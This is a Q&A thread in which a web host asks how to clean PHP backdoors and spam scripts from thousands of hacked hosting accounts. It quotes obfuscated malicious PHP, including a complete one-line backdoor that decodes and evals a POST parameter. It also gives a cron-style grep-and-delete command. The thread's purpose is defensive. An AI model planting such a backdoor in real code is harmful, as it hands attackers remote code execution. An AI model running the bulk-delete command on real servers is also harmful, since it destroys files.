0

I have multiple VPS with at least thousands of accounts in them.

My clients' websites are hacked and sending spam emails. I checked the log and found out two types of scritps

type1:

<?php 
$d79="HYI\riP=s5`bX'a43Z #fn%dTy9c|JWjMV<z0Q]6&kD}UECrue~mq8->N2hpx_!Bo*g\nK\$O1{7G[^.L+Rw\\;?FA)lt\tS@,/\":(v"; $GLOBALS['ujijy64'] = $d79[4].$d7

type2:

<?php
function wtakziboyl($gaezs, $fp){$vdxhvfmnol = ''; for($i=0; $i < strlen($gaezs); $i++){$vdxhvfmnol .= isset($fp[$gaezs[$i]]) ? $fp[$gaezs[$i]] : $gaezs[$i];}
$otcow="base64_decode";return $otcow($vdxhvfmnol);}
$sfnb = '4fwFMBxy214Q5XBm8exm1XHK2m83NZsBdZpzvpzUMRsz1jCwgJArtfxr1X'.
'Bm8exm8m83NSUzvpzUMRsz1jCwgJArtRhY1XBY2RCIgfwKtwxkMRIw5mpAbJ'.
'aiJa0y21cqgfwE2Bx3MRIzgJApOd3OJeweOfwy8XBkOJcqnkBPBaBPOPaOopQ55hxdcB'.

After further investigating I found out injected scripts at the top of Genuine files like below

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828e00'])) {eval($s21(${$s20}['n828e00']));}?>

This above code I suspect as backdoor. I want to remove all those scripts or atleast stop them from executing it. May be I can use modsec rules.

By surfing internet I found out we can run below code to remove such injection

grep -Rl PCT4BA6ODSE . | xargs sed -i 's/<[?]php.*PCT4BA6ODSE_.*[?]>/<\?php \/\/ RECOVERED FILE \?>/g'

Manually finding such files in server where thousands of account are hosted is something like impossible. So i want it to do automatically (in this case)

I know there are many other backdoors but for this scenario what you people suggest?

This may not be the good idea and it may affect server performance, I would love to hear any alternative ideas.

Prakash
  • 332
  • 2
  • 14
  • 2
    You tagged this question with [tag:email] and [tag:spammer], but your question doesn't seem to be related to either. In any case, I would suggest that the presence of a sequence of characters like `PCT4BA6ODSE_` in an uploaded file is the least of your worries. You should be more concerned by the fact that you have — apparently — created a service where unknown individuals can upload executable files and run them on your server. – r3mainer Oct 08 '15 at 12:06
  • 2
    Just guessing, but what you probably want is to disable execution of PHP files inside upload folder. You cau use `php_flag engine off` in `.htaccess` file in upload directory for that. To get rid of the backdoor from existing files and some insight into what is it doing, see [WordPress Remote Code Execution](http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/) – bretik Oct 08 '15 at 13:17
  • Possible duplicate of [How do I deal with a compromised server?](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – Deer Hunter Oct 08 '15 at 13:38
  • "hacked accounts with php files" - I think that statement needs some explanation before we can answer your question. Define 'accounts'. OS accounts? Web accounts? – schroeder Oct 08 '15 at 14:41
  • In addition to @bretik's comment, look at using "Options -Indexes -ExecCGI" in your .htaccess file, if your hoster permits you to do this. – Scott C Wilson Oct 08 '15 at 15:33

1 Answers1

2

Answering your question (but not solving your problem):

Run this every hour or so:

grep -l PCT4BA6ODSE_ * | xargs rm

This will delete every php file with that string on it. But that string is only the symptom, not the problem. The problem is that you have a security compromise, and no matter how you clean your system, it will be reinfected.

To really solve your problem, you must audit all the components of the system. The easiest way is to reinstall everything from scratch, update every component, harden its settings, search every php file for backdoors, then put the system online again.

ThoriumBR
  • 50,648
  • 13
  • 127
  • 142